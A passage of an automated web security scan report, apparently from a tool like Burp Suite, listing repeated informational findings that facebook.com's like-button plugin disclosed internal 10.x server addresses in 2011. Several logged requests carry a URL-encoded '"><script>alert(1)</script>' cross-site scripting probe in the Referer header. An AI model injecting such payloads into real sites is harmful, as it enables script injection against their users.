Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.81.110
X-Cnection: close
Date: Mon, 09 May 2011 14:08:53 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.24. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.70.113
X-Cnection: close
Date: Mon, 09 May 2011 14:08:53 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.25. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story&layout=button_count&show_faces=true&width=135&action=recommend&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.117.109
X-Cnection: close
Date: Mon, 09 May 2011 13:59:34 GMT
Content-Length: 7014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.26. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?9bbab HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?9bbab%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee0199fca83b=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.117.111
X-Cnection: close
Date: Mon, 09 May 2011 14:08:58 GMT
Content-Length: 8659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.27. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.74.110
X-Cnection: close
Date: Mon, 09 May 2011 14:08:51 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.28. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.92.116
X-Cnection: close
Date: Mon, 09 May 2011 14:08:54 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.29. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&api_key=MY%20APP%20ID&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2367f728c%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&layout=standard&locale=en_US&node_type=link&ref=recommend&sdk=joey&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.116.114
X-Cnection: close
Date: Mon, 09 May 2011 13:59:39 GMT
Content-Length: 10323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.30. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.109.130
X-Cnection: close
Date: Mon, 09 May 2011 14:08:51 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.31. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown&send=false&layout=button_count&width=100&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.110.107
X-Cnection: close
Date: Mon, 09 May 2011 14:01:13 GMT
Content-Length: 6995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.32. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.103.120
X-Cnection: close
Date: Mon, 09 May 2011 14:08:51 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.33. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.thevine.com.au%2Fmusic%2Fblogs%2Fmusic-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&layout=box_count&show_faces=true&action=like&colorscheme=light&width=55&height=65 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.117.116
X-Cnection: close
Date: Mon, 09 May 2011 14:07:00 GMT
Content-Length: 7086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.34. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.81.107
X-Cnection: close
Date: Mon, 09 May 2011 14:08:53 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.35. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story&layout=button_count&show_faces=true&width=135&action=recommend&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.120.130
X-Cnection: close
Date: Mon, 09 May 2011 13:59:33 GMT
Content-Length: 7014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.36. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.78.110
X-Cnection: close
Date: Mon, 09 May 2011 14:08:54 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.37. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.70.115
X-Cnection: close
Date: Mon, 09 May 2011 14:08:52 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.38. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.72.102
X-Cnection: close
Date: Mon, 09 May 2011 14:08:51 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.39. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
